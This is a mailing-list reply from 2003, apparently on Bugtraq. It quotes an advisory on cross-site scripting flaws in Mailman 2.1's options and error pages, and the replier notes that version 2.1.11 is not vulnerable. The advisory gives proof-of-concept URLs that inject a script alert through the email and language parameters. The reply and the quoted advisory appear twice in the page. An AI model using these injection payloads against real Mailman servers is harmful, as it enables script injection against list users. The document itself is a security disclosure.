<h2>Error</h2><strong>Invalid options to CGI script.</strong>
2.0.11 doesn't seem to be vulnerable to this.
(although it's got some other issues, but nothing serious for an
internal site..)
> -----Original Message-----
> From: webmaster (at) procheckup (dot) com [email concealed] [mailto:webmaster (at) procheckup (dot) com [email concealed]]
> Sent: Friday, January 24, 2003 5:35 AM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: Mailman: cross-site scripting bug
>
>
>
>
> Product: Mailman
> Affected Version: 2.1 not other version has been tested
> Vendor's URL: http://www.gnu.org/software/mailman/
> Solution: TBC
> Author: Manuel Rodriguez
>
> Introduction:
> ------------
> Mailman is software to help manage electronic mail discussion
> lists, much
> like Majordomo or Smartmail. And Mailman have web interface systems.
>
>
> Example:
> -----------------
> This is a simple example for version 2.1:
>
> 1) With mailman options the email variable is vulnerable to
> cross-site
> scripting.
>
> You can recognise the vulnerabilities with this type of URL:
>
> https://www.yourserver.com:443/mailman/options/yourlist?
> language=en&email=<SCRIPT>alert('Can%20Cross%20Site%20At
> tack')</SCRIPT>
> and that prove that any (malicious) script code is possible on web
> interface part of Mailman.
>
> 2) The default error page mailman generates does not
> adequately filter its
> input making it susceptible to cross-site scripting.
>
> https://www.yourserver.com:443//mailman/options/yourlist?
> language=<SCRIPT>alert('Can%20Cross%20Site%20Attack')<
> ;/SCRIPT>
>
https://workserver//mailman/options/ak3barons?language=<SCRIPT>ale
rt('Can%20Cross%20Site%20Attack')</SCRIPT>
returns:
<h2>Error</h2><strong>Invalid options to CGI script.</strong>
2.0.11 doesn't seem to be vulnerable to this.
(although it's got some other issues, but nothing serious for an
internal site..)
> -----Original Message-----
> From: webmaster (at) procheckup (dot) com [email concealed] [mailto:webmaster (at) procheckup (dot) com [email concealed]]
> Sent: Friday, January 24, 2003 5:35 AM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: Mailman: cross-site scripting bug
>
>
>
>
> Product: Mailman
> Affected Version: 2.1 not other version has been tested
> Vendor's URL: http://www.gnu.org/software/mailman/
> Solution: TBC
> Author: Manuel Rodriguez
>
> Introduction:
> ------------
> Mailman is software to help manage electronic mail discussion
> lists, much
> like Majordomo or Smartmail. And Mailman have web interface systems.
>
>
> Example:
> -----------------
> This is a simple example for version 2.1:
>
> 1) With mailman options the email variable is vulnerable to
> cross-site
> scripting.
>
> You can recognise the vulnerabilities with this type of URL:
>
> https://www.yourserver.com:443/mailman/options/yourlist?
> language=en&email=<SCRIPT>alert('Can%20Cross%20Site%20At
> tack')</SCRIPT>
> and that prove that any (malicious) script code is possible on web
> interface part of Mailman.
>
> 2) The default error page mailman generates does not
> adequately filter its
> input making it susceptible to cross-site scripting.
>
> https://www.yourserver.com:443//mailman/options/yourlist?
> language=<SCRIPT>alert('Can%20Cross%20Site%20Attack')<
> ;/SCRIPT>
>
[ reply ]